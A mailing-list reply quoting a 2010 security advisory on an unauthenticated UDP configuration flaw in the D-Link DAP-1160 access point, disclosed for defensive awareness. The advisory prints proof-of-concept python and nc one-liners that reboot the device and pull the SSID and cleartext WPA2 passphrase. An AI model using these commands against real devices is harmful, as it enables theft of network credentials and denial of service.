Is that UDP 2003 open on the WAN interface as well? Gary Baribault
On 06/28/2010 09:50 AM, Cristofaro Mune wrote: > Security Advisory > > IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration > > > > Advisory Information > -------------------- > Published: > 2010-06-28 > > Updated: > 2010-06-28 > > Manufacturer: D-Link > Model: DAP-1160 > Firmware version: 1.20b06 > 1.30b10 > 1.31b01 > > > > Vulnerability Details > --------------------- > > Public References: > Not Assigned > > > Platform: > Successfully tested on D-Link DAP-1160 loaded with firmware versions: > v120b06, v130b10, v131b01. > Other models and/or firmware versions may be also affected. > Note: Only firmware version major numbers are displayed on the > administration web interface: 1.20, 1.30, 1.31 > > > Background Information: > D-Link DAP-1160 is a wireless access points that allow wireless clients > connectivity to wired networks. > Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported. > > > Summary: > Unauthenticated access and modification of several device parameters, > including Wi-Fi SSID, keys and passphrases is possible. > Unauthenticated remote reboot of the device can be also performed. > > > Details: > DCCD is an UDP daemon that listens on port UDP 2003 of the device, that > is likely used for easy device configuration via the DCC (D-Link Click > 'n Connect) protocol. > By sending properly formatted UDP datagrams to dccd daemon it is > possible to perform security relevant operation without any previous > authentication. > It is possible to remotely retrieve sensitive wireless configuration > parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases, > along with other additional information. > It is also possible to remotely modify such parameters and configure the > device without any knowledge of the web administration password. > Remote reboot is another operation that an attacker may perform in an > unauthenticated way, possibly triggering a Denial-of-Service condition. > > > POC: > - Remote reboot > python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003 > > - Retrieving Wi-Fi SSID > python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt > -u <IP_ADDR> 2003 > cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the > received datagram) > > - Retrieving WPA2 PSK > python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | > nc -u -o pass.txt <IP_ADDR> 2003 > cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the > received datagram) > > > Impacts: > Remote extraction of sensitive information > Modification of existing device configuration > POssible Denial-of-Service > > > Solutions & Workaround: > Not available > > > > Additional Information > ---------------------- > Timeline (dd/mm/yy): > 17/02/2010: Vulnerability discovered > 17/02/2010: No suitable technical/security contact on Global/Regional > website. No contact available on OSVDB website > 18/02/2010: Point of contact requested to customer service > ----------- No response ----------- > 26/05/2010: Partial disclosure at CONFidence 2010 > 28/06/2010: This advisory > > > Additional information available at http://www.icysilence.org > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
